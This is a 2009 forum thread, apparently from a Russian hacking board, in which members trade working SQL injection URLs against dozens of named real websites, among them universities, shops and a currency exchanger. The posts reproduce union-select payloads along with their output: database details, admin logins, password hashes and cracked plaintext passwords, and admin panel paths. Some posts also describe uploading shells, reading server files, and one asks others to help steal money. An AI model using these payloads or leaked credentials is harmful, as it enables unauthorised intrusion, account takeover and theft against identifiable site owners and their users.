View full version: SQL Injections



RulleR
08.06.2009, 14:43
[PR 4]
http://www.foodanddrinkfest.com/index.php?id=-45+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15,16
5.0.77:foodfest_fest:foodfest_food@localhost

[PR 3]
http://www.foodmachineryonline.com/product_desc.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30
4.1.22-standard-log:foodmactest:foodmactest@localhost

[PR 0]
http://auction.lebanese.us/product_desc.php?id=-38+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,28,30,31,32,33,34 ,35
4.1.22-max-log:LebAuction:LebAuction@97.74.144.146

[PR 0]
http://www.10000vacations.com/rentals/product_desc.php?id=1+union+select+1,2,concat_ws(0 x3a,0x3c2f7469746c653e,version(),database(),user() ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27
5.0.75-community-log:producx5_vacrentals:producx5_rentals@localhost

DezMond™
08.06.2009, 15:10
http://www.pro-limit.com/displayitemv10comp.php?item_id=-5198+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+f rom+users+/*+

http://www.arcep.fr/index.php?id=2124&L=%29&tx_gsactualite_pi1[uid]=-1151+union+select+1,2,3,4,concat_ws(0x3a3a,usernam e,password),6,7,8+from+be_users--&tx_gsactualite_pi1[annee]=&tx_gsactualite_pi1[theme]=&tx_gsactualite_pi1[motscle]=&tx_gsactualite_pi1[backID]=24&cHash=7257875ce6
$typo_db_username = 'arcep'; // Modified or inserted by TYPO3 Install Tool.
$typo_db_password = 'arcep&sql'; // Modified or inserted by TYPO3 Install Tool.
arcep_blog_admin:73c6ff6a9178b1138f60eb0fb26e669f - XX23TXX
arcepadm:b91761c6674315b460a532a8b1f636df - QLT23TPP


http://demo.pegas-studio.net/ind.php?id_typ=-73+UnIoN+SeLeCt+1,2,3,4,5,6,7,Concat_ws(0x3a3a,Use rname,User_password,User_email),9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28+from+phpb b_users+--+&tr=1

http://alvimed.com.ua/catalogue.php?action=viewitem&item_id=-34+union+select+1,2,3,4,5,6,7,database(),9+/*+
webkhark_alvimed

AlexSatter
08.06.2009, 15:19
PR 4
http://www.gameszoo.org/voynichmonkeys/viewmsg.php?gr=1&num=15585+and+substring(version(),1,1)=5

udman
08.06.2009, 17:19
Phew, I barely managed to find a Russian site that hasn't been hacked :D

http://www.allsportinfo.ru/
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,user(),version(),databa se()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25+LIMIT+600,1+--+
u55928@10.10.223.218
5.0.67-log
u55928


Tables as a list
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,table_name,column_name),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25+FROM+INFORMAT ION_SC HEMA.COLUMNS+LIMIT+777,1000+--+


Admins as a list
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,login,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+FROM+dom_adminlogin+LIMIT+600,1000+--+


The admin panel is at the standard location, just append Admin/
In the admin panel you can upload a shell, but only via an image

Dimionx
08.06.2009, 17:42
www.vdiec.edu.in

http://www.vdiec.edu.in/go.php?show=about&id=-1+union+select+1,concat_ws(0x0b,version(),user(),d atabase()),3,4,5,6

Version - 4.1.22-STANDARD
User - VDIEC_ROOT@LOCALHOST
DB - VDIEC_DATA

Path to the admin panel
http://www.vdiec.edu.in/admin/login.php
Accessible table - members (guess away...)

Kimliksiz
08.06.2009, 19:41
http://cms.wmhelp.com//index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user

http://www.sudeoptik.com/admin/

yunusemre@birpiksel.com:98d292620ce4e8087db271b691 e28a4c : 458796

beerhack
08.06.2009, 19:51
https://php.csumb.edu/infotech/brp/r_summary.php?id=-99999'+union+select+1,version(),3/*
Database Version: 5.0.45
Database name: brp
User name: brp@localhost

Skofield
08.06.2009, 20:56
http://www.learn.unh.edu PR 5
http://www.learn.unh.edu/pcw/pd/sched.php?id=51+union+select+concat_ws(0x3a,versio n(),database(),user())/*

Database version: 5.0.45
Database name: 37560_learnunhedu
User name: 37560_user395554@lnh-www1b.bluehalo.myregisteredsite.com

AdminUsers:
http://www.learn.unh.edu/pcw/pd/sched.php?id=51+union+select+concat_ws(0x3a,userna me,password)+from+AdminUsers/*

username : admin
password : AA422kbolton

http://www.learn.unh.edu/admin

Krist_ALL
08.06.2009, 20:59
http://www.neari.com/book.php?id=-32+union+select+1,concat_ws(0x3a,(select+name+from +users),(select+password+from+users),user(),databa se(),version()),3,4,5,6,7,8,9,10,11,12,13,14+

the output is in the title

Branch 4.

Login - diane
Password - 4f8c0d28489d5d0ee78dc35f61347b24 - nearipress

Didn't find the admin panel

RulleR
08.06.2009, 21:04
http://www.newandusedpalletracking.co.uk/article.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user())4.1.22:threejc:threejc@localhost
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user())--&scat=255.0.77-сommunity:ga_news:venkat@174.120.39.50
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,user,pas sword,file_priv)+from+mysql.user--&scat=25root:*0525C96363D8CBCFC3E75DA251B92E10F9B43 620:Y http://www.interspaziale.it/firme/articolo.php?id=-20223+union+select+1,2,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),4,5,6,7,8,9,10,11,12, 13,14,15,16
4.1.10-log:internazionale:internazionale@10.10.0.11http://vesen.hydra.is/spjald/slinkarc.php?id=-15383+union+select+concat_ws(0x3a,version(),databa se(),user())5.0.24a-Debian_9ubuntu2-log:ymis:root@localhosthttp://vesen.hydra.is/spjald/slinkarc.php?id=-15383+union+select+concat_ws(0x3a,user,password,fi le_priv)+from+mysql.user
root:40ede04861443872:Y

Xizor
08.06.2009, 22:15
http://www.nzcamping.co.nz/region.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10/*

version: 4.0.27-standard-log
user: nzcampin@202.191.34.7
database: nzcampin

http://www.theatreview.co.nz/reviews/review.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30/*

When trying to find out the version etc., I ran into an encoding problem, namely a message like this >>Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
I also tried substituting queries of the form
char()
before the union I put: COLLATE utf8_general_ci and so on.
But, alas, nothing worked; maybe someone else will manage to work this SQL injection out.

Gorev
08.06.2009, 22:21
Xizor http://forum.antichat.ru/thread104591.html

http://www.theatreview.co.nz/reviews/review.php?id=-1+union+select+1,2,3,4,5,cast(concat_ws(0x3a,Versi on(),database(),user(),@@version_compile_os)+as+bi nary),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30/*


Version : 4.1.15-LOG
Database : THEATREVIEW
User : THEATREVIEW@LOCALHOST
Os : REDHAT-LINUX-GNU

M.W.N.N.
09.06.2009, 00:52
http://journals.volunteer.org.nz/entry.php?id=1834+union+select+1,2,concat_ws(0x3a, version(),database(),user()),4,5,6,7+from+user+lim it+1,1/*
version():4.0.24_Debian-10sarge3-log
database():journals
user():journals@localhost

http://journals.volunteer.org.nz/entry.php?id=1834+union+select+1,2,concat_ws(0x3a, name,password),4,5,6,7+from+user+limit+1,1/*
Administrator:freedom1
__
http://www.theatreview.co.nz/reviews/review.php?id=2237++union+select+1,2,3,4,5,unhex(h ex(concat_ws(0x3a,version(),database(),user()))),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30+limit+1,1/*

version()4.1.15-LOG
database():THEATREVIEW
user():THEATREVIEW@LOCALHOST

..::TROYAN::..
09.06.2009, 01:29
some Chinese shop...

http://shop.rzxx.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user(),0x7c,version(),0x7c,database()),8/*

rzxxshop@localhost|4.0.25-nt-log|rzxxshop


http://shop.rzxx.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*

admin|e68969db498985f423ece7ba02213c24:bluehut51|b luehtu@163

the server is running WINNT

Safe-mode: ON (secure)

btw the main site has PR:4

SkyLine32
09.06.2009, 03:47
Kharkiv National University of Internal Affairs :D
http://www.univd.edu.ua/index.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 5.0.67-log
Database name: univd
User name: univd@localhost
http://www.univd.edu.ua/index.php?id=-1+union+select+1,table_name,3+from+information_sch ema.tables--
There is a huge number of tables.

AlexSatter
09.06.2009, 08:03
http://www.abiturcenter.ru/testi/begin.php?log=guest&step=2&sc_id=15+union+select+1,concat_ws(0x3a,version(),u ser(),database()),3,4,5,6/*
4.0.27-log:www1@zvm7.host.ru:abiturdb

TIC 1600

mailbrush
09.06.2009, 10:42
http://www.donstroy.info/architectors/demon.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4
donstroy@miami.skif.net:donstroy:4.0.27

AlexSatter
09.06.2009, 10:47
http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,version(),user(), database())
4.1.22:digs_mysql@194.85.95.84:digs_ihtc

the site has a forum, phpbb, let's try querying phpbb_users

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+phpbb_users
"38" is displayed, let's try to pull out the users and passwords

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,user_id,username, user_password)+from+phpbb_users+limit+1,1

change the limit...


etc.

------------------

http://www.blesna-n.ru/fotoalbum.php?rez=-2+union+select+11111,22222,concat_ws(0x3a,version( ),user(),database())
it shows up in the link (<A HREF=../pic/big_regats/4.1.22:blesnan@tix.hc.ru:wwwblesnanru target="1" or you can just look at the status bar when hovering over the spot where the photo should have been :) )

----------------

http://www.clever.saratov.ru/site/photo/index.php?id_parent=2+and+substring(version(),1,1) =5

-----------------

http://www.3eye.ru/screen-info.php?screen=-7+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9
4.0.17:3eye@localhost:3eye

udman
09.06.2009, 13:28
http://www.gmpr.ru
http://www.gmpr.ru/news_item.php?id=-669'+UNION+SELECT+0,1,con cat_Ws(0x0b,user(),version(),database()),3,4,5,6,7 ,8,9+--+
gmpr@localhost
5.0.45-log
gmpr

Login: 26
Pass: 55
No idea where to enter them ))

http://www.mobilecomm.ru
http://www.mobilecomm.ru/view.php?id=-243'+UNION+SELECT+0,1,2,3,4,concat_ws(0x0b,user(), data base(),version()),6,7+--+

z90196_mobilecom@77.221.130.20
z90196_mobilecom
5.0.32-Debian_7etch4-log

M.W.N.N.
09.06.2009, 13:43
http://www.konka.co.nz/productdetail.php?id=33+union+select+1,2,concat_ws (0x3a,version(),database(),user()),4,5,6,7,8,9,10, 11,12,13,14,15+limit+1,1/*

version():4.1.22-standard-log
database():ncpgroup_konka
user():ncpgroup_konka@localhost

http://www.konka.co.nz/productdetail.php?id=33+union+select+1,2,concat_ws (0x3a,username,password),4,5,6,7,8,9,10,11,12,13,1 4,15+from+users+limit+1,1/*

admin:21232f297a57a5a743894a0e4a801fc3

mailbrush
09.06.2009, 14:08
http://www.thefashioninsider.com/mobil.php?rub=supermodels&id=35+and+substring(version(),1,1)=3
http://comicstrip.ca/make.php?id=282+and+substring(version(),1,1)=5

Skofield
09.06.2009, 14:23
http://www.cis.uab.edu PR 5
http://www.cis.uab.edu/news/sem_details.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6/*

Database version : 4.1.20-log
Database name : db
User name : web@monkey.cis.uab.edu

udman
09.06.2009, 14:37
http://www.scorcher.ru
http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,user(),ve rsion(),database()),2,3,4,5,6,7,8,9

scorcher0@localhost
5.0.27
scorcher


Some users
http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,emailAddress,pa ss wd,realName),2,3,4,5,6,7,8,9+FROM+yabbse_members+L IMIT+0,1

fornit@wmail.ru
af2dyfoj97nAU
fornit

Looks like the site's author decided to make fun of hackers ))
http://www.scorcher.ru/hruk/hruk.php

AlexSatter
09.06.2009, 14:57
http://leoshow.com/short.php?id=-33+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9/*
4.0.27-log:artmasterofby@eclipse.tutby.com:artmasterofby

DezMond™
09.06.2009, 15:03
http://www.adecor.ru/plastic-one-subitem.php?item_id=1&subitem_id=-6+union+select+1,table_name,3,4+from+information_s chema.tables+/*+

http://adekor.ru/plastic-one-subitem.php?item_id=2&subitem_id=-10+union+select+1,table_name,3,4+from+information_ schema.tables+/*+

http://www.superkrovlya.ru/files/print_page.php?ID=&t=d&mid=-151+UnIoN+SeLecT+database(),2,3,4,5,6,7,8+/*+&item_id=54

http://www.partymaker.lv/?l=-1'+union+select+1,2,3,concat_ws(0x3a3a,database(), version()),5,6,7+--+&item_id=13
partymaker::4.0.26

Skofield
09.06.2009, 15:28
http://www.mbvo.wwu.edu PR 5
http://www.mbvo.wwu.edu/abstracts/abstractText.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--

Database version : 5.0.75
Database name : mbvo
User name : mbvoUser@localhost

BHYCHIK
09.06.2009, 15:37
Vulnerability on the site http://www.marcialpons.es

Vulnerable script: http://www.marcialpons.es/fichalibro.php?id=100708769

DB version: 4.1.20
DB name: Libreria
User: root@localhost
OS: redhat-linux-gnu

Site directory:
/var/www/html

The FILE privilege is available, here is the .htaccess in the admin folder:
http://www.marcialpons.es/fichalibro.php?id=100708769%27+and+0+union+select+ 1,2,3,LOAD_FILE(%27/var/www/html/admin/.htaccess%27),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,8 5--+

A shell can be uploaded.

There is access to mysql.user
http://www.marcialpons.es/fichalibro.php?id=100708769%27+and+0+union+select+ 1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85+from+mysql.user--+

My video of hacking this site
http://forum.antichat.ru/showthread.php?p=1319721#post1319721

Skofield
09.06.2009, 15:51
http://www.evergreenrecreation.com PR 4
http://www.evergreenrecreation.com/facilities.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12/*

Database version : 4.1.25-Debian_mt1
Database name : db49768_eprd
User name : db49768@72.47.224.21

users:
http://www.evergreenrecreation.com/facilities.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8,9,10,11,12+from+users/*

username : eprdadmin
password : 665c6986e7fbd5ef7c89d2cbb1464f2b

AlexSatter
09.06.2009, 16:00
MySQL version 3
http://www.1019thewave.com/community/promo.php?id=12+and+substring(version(),1,1)=3
----------------
http://www.mygreatfood.com/promo.php?id=-2+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11,12,13,14,15
5.0.45:mygreatfood@localhost:mygreatfood

lots of tables; MemberInfo looks like something interesting

Skofield
09.06.2009, 16:10
http://nmefc.nmt.edu PR 4
http://nmefc.nmt.edu/ContactUs.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())--

Database version : 5.0.67-0ubuntu6
Database name : nmefc
User name : nmefcpub@localhost

AlexSatter
09.06.2009, 16:15
http://galadarihotel.lk/promo.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
5.0.77-community:galadari_user@localhost:galadari_db

the tables have no user/password.

http://www.bestofbeing.ca/promo.php?id=-9+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
4.1.25-Debian_mt1:db15459@64.13.232.26:db15459_bestofbein g

beerhack
09.06.2009, 16:21
PR5
http://cs.tcnj.edu/website/facultyview.php?id=-99999+union+select+version(),2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17--
Database Version: 5.0.51a-3ubuntu5.4
Database name: deptWebSite
User name: wwwsite@csprod.TCNJ.EDU

Getting Data from table g2_User ( Rows) from database gallery2
Fields g_userName:g_hashedPassword

[0]:guest:1R\\0c363332a05345c8e22287768abe7bcd
[1]:admin:LjSE938e074bdcdd55e531547bf94f2decde

http://cs.tcnj.edu/gallery2/main.php

AlexSatter
09.06.2009, 16:25
MySQL version 3 again
http://www.ultra-it.com/promo.php?Id=2+and+substring(version(),1,1)=3

udman
09.06.2009, 16:39
http://simbatron.ru

simbatron: Deposit, withdraw, buy, sell, exchange Webmoney, cash E-gold. WMZ, WMR cards. Transfers via Western Union, Wire Transfer, WM, Fethard, Yandex.Money

http://simbatron.ru/auto_sota.php?metod=popoln&pnump=-375'+UNION+SELECT+0,concat_Ws(0x0b,0x0b,user(),ver sion(),database(),0x0b),2+--+&p=201

simbatron_mysql@194.85.90.24
4.1.22
simbatron_db


if anyone finds a way to steal the money, PM me, I'd be grateful ))))

AlexSatter
09.06.2009, 17:15
http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9
4.0.12:mtrans@localhost:mtrans

There is a users table
http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,id,login,pass),3 ,4,5,6,7,8,9+from+users

1:mtrans:0d0b9ff307d6c7f6

Admin panel: http://www.m-trans.vbg.ru/admin.php
------------
http://yellopagespakistan.com/yp/bl.php?subcat=254+and+substring(version(),1,1)=5

BHYCHIK
09.06.2009, 17:23
SQL injection on http://www.incult.es

Vulnerable script: http://www.incult.es/projectinfo.php?id=8

DB version: 5.0.32-Debian_7etch10-log
DB name: incult
User: incult@localhost
OS: pc-linux-gnu

Tables outside information_schema
http://www.incult.es/projectinfo.php?id=8%27+and+0+union+select+1,2,3,4 ,5,6,7,8,9,10,11,group_concat(table_name),13,14,15 ,16,17,18,19,20,21+from+information_schema.tables+ where+table_schema%3C%3E%27information_schema%27--+

Didn't find anything else of interest.

M.W.N.N.
09.06.2009, 18:03
http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,ve rsion(),database(),user())+limit+1,1/*

version():4.0.27-standard-log
database():csm
user():thoseguys@ws4.int.mydns.net.nz

http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,us er,pass)user+from+users+limit+1,1/*

thoseguys:55ffc53f170544b887252ff7e454e5a3

BHYCHIK
09.06.2009, 19:10
SQL injection on http://biblioteca.unizar.es

Vulnerable script: http://biblioteca.unizar.es/biblio.php?id=27

DB version: 4.0.20-standard
DB name: biblioteca-biblioteca
User: webiblio@alano.unizar.es
OS: pc-linux

List of users and their passwords:
http://biblioteca.unizar.es/biblio.php?id=-27+union+select+concat_ws(0x3a,login,pwd),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+usu arios+limit+0,1--+

There is no FILE privilege and no access to mysql.user.

Skofield
09.06.2009, 21:52
PR 2
http://www.colgate13.org/members.php?memid=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,versio n(),database(),user()))),4,5,6,7,8,9,10,11,12,13,1 4/*

Database version : 4.1.16-standard-log
Database name : colgate13
User name : thirteen@grant.dreamhost.com

HAXTA4OK
09.06.2009, 22:31
http://www.invictory.com.ua/tips_issue.php?id=1000000+union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6+--+

ivcomua_db@localhost:4.1.22-standard:ivcomua_db


####################################
oracle :D

http://oracle.ukrsat.com/tutorial/openxs.php?n=80+and+substring(version(),1,1)=3

########################################
http://bloggreenwood.com/members/profile_view_ind.php?id=1'+and+substring(version() ,1,1)=5+--+

And here's my first video on Antichat )) :D

http://forum.antichat.ru/thread124487.html the link is there ))

AlexSatter
10.06.2009, 08:20
MySQL version 3

http://www.bicentenary.tas.gov.au/text.php?id=66+and+substring(version(),1,1)=3

mailbrush
10.06.2009, 12:31
http://www.akpr.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6u44790@10.10.223.230:u44790:5.0. 67-loghttp://www.newchemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9u44790@10.10.223.230:u4479 0_3:5.0.67-loghttp://polymery.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9u44790@10.10.223.230:u4479 0:5.0.67-log
http://petrochemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9u44790@10.10.223.230:u4479 0_2:5.0.67-log

Skofield
10.06.2009, 12:54
PR 6
http://www.mhfa.com.au/instructor_details.php?id=-694+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48/*

Database version : 4.1.22-standard-log
Database name : mhfa_db
User name : mhfa@10.194.10.112

beerhack
10.06.2009, 13:13
http://php.louisville.edu/news/multimedia/multimedia.php?id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11/*
Database Version: 5.0.27-standard
Database name: releases
User name: releases@136.165.237.189

AlexSatter
10.06.2009, 13:19
PR3
http://mywebs.ru/text.php?id=-10+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5
5.0.67-log:u50510@10.10.153.173:u50510
-------------
Decided to take a quick look through the Portfolio section... found several more vulnerable sites:

PR4, TIC 130
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(), database())
5.0.67-log:u83453@10.10.223.247:u83453

The pixelpost_config table caught my interest
Pulling out the data
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,id,admin,password ,email)+from+pixelpost_config
1:admin:e807f1fcf82d132f9bb018ca6738a19f:test@eer. ru
Decrypting:
e807f1fcf82d132f9bb018ca6738a19f = 1234567890

There is an admin login at http://triluchnik.ru/admin
authorization there is apparently via .htaccess; it doesn't work with the credentials above.

Dimionx
10.06.2009, 15:02
www.surf2surf.co.nz
[PR=4]

http://www.surf2surf.co.nz/page.php?id=-111+union+select+1,concat_ws(0x0b,version(),user() ,database()),3,4,5,6,7

Version - 5.0.45
User - surf2surf@localhost
DB - surf2surf

P.S. access to the tables is closed

AlexSatter
10.06.2009, 15:10
PR2, TIC 40
http://nissanbu.ru/show_new.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4
4.0.27-max-log:nissan60@v52.valuehost.ru:nissan60

------
PR2, TIC 90
http://www.honda.spb.ru/news-text.php?id=-158+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7
4.1.22:ralfart@localhost:ralfart

p.s. Dimonx, there is an admanager table with a bunch of tables, everything is accessible. Dig in.

Rubaka
10.06.2009, 15:28
http://www.promiseland.it/view.php?id=-2975/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

Database Version: 5.0.45-log
Database name: promiseland_news
User name: promise_guest@localhost

AlexSatter
10.06.2009, 15:43
PR1
http://www.akalita.com/press/text.php?id=-4+union+select+1,concat_ws(0xa,version(),user(),da tabase()),3,4,5
5.0.67-log u98256@10.10.153.180 u98256_akalita

Apparently there are several sites on one account, which I haven't found yet
Several databases are accessible: u98256,u98256_1981,u98256_blog,u98256_akalita
u98256_blog is a WordPress database.

pulled the admin from wp_users
1:admin:$P$Bol8Q7tR5wPHFqk6NkjB7R6/7FdLFa0

the other databases have nothing related to authorization; apparently it's all set in the configs.

beerhack
10.06.2009, 15:51
PR6
http://corsair.cs.iupui.edu:20191/picturegallery/photo.php?id=-99999+union+select+1,2,3,version(),5/*
Database Version: 5.0.22-standard
Database name: jsellmer_db
User name: jsellmer@localhost

Getting Data from table phpbb_users ( Rows) from database test
Fields username:user_password
[0]:Anonymous:
[1]:arowls:39b35d4edd6999d6bfaf563bfa2bb661
[2]:solivares:b2693d9c2124f3ca9547b897794ac6a1(maya)
[3]:Brian Lewis:2f2b4669f9c0d578a94c9a32fc72f1c8

Getting Data from table userList ( Rows) from database test_db
Fields user:pass:email
[0]:nidodson:password:nidodson@gmail.com
[1]:na3d:password:nidodson@iupui.edu

AlexSatter
10.06.2009, 15:53
PR0, TIC 0
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11/*
4.0.20-log:brainz@localhost:brainz
There is a users database; the only fields I managed to guess were user_id, user_password... I looked for where the username is stored, ... ran out of imagination.
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user_i d,user_password),9,10,11+from+users/*
1:76a2173be6393254e72ffa4d6df1030a
The hash was decrypted easily:
76a2173be6393254e72ffa4d6df1030a = passwd

Dimionx
10.06.2009, 15:57
www.tech-pack.co.nz
[PR: 1]

http://www.tech-pack.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x0b ,version(),user(),database()),6,7,8

Version - 4.0.26-standard
User - techp@localhost
DB - techp

www.todayskitchens.co.nz
[PR: 2]

http://www.todayskitchens.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),u ser(),database()),6,7,8

Version - 4.0.26-standard
User - todaysk@localhost
DB - todaysk

www.adventureconcepts.co.nz
[PR: 3]

http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,table_name,6,7 ,8+from+information_schema.tables

Version - 5.0.37-standard
User - advent_cms@localhost
DB - advent_cms

http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x3a ,table_name,column_name),6,7,8+from+information_sc hema.columns

All the tables and their columns

www.gearcutting.co.nz
[PR: 1]

http://www.gearcutting.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),u ser(),database()),6,7,8


Version - 4.0.26-standard
User - gearcms@localhost
DB - gearcms

www.clockworkstudio.co.nz
[PR: 2]

http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,versio n(),user(),database()),8,9,10/*

Version - 4.0.27-standard-log
User - schmoove@ws5.int.mydns.net.nz
DB - clockwork

Table with users:

http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,userna me,password),8,9,10+from+users+limit+1,1/*

nick
378867a9bad163c4c77062685b3584af:cl0ckw0rk

Admin panel
www.clockworkstudio.co.nz/admin/
Login - nick
Pass - cl0ckw0rk

AlexSatter
10.06.2009, 15:58
PR5
http://www.stadtumbau-ost.info/index.php?request=/service/email-abo/nl-text.php?id=-41+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4
4.1.22-standard-log:db63113@local2:db63113

PR5, TIC 140
http://www.uapravo.org/text.php?id=-1189+union+select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6,7,8,9,10,11
5.0.32-Debian_7etch10-log:oleps@localhost:uapravo
looked through the tables; there is nothing relating to users...

PR4, TIC 1400
http://edina-rodina.org/text.php?id=14+and+substring(version(),1,1)=5

PR4
http://www.lennartpersson.se/text.php?ID=910+and+substring(version(),1,1)=5

PR4
http://www.zionmag.org/text.php?id=633+and+substring(version(),1,1)=4

PR4, TIC 10
http://auto.properm.ru/sale/text.php?id=7177+and+substring(version(),1,1)=5/*

PR0, TIC 0
http://realmagazine.ru/rmgid/text.php?id=-604+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database())
4.1.22-log:simplema_wwwreal@fe80.hc.ru:wwwrealmagaziner_w wwrealmagaziner

PR0, TIC 0
http://www.mdsg.org.uk/text.php?ID=-0+and+substring(version(),1,1)=5

erihtoney
10.06.2009, 18:09
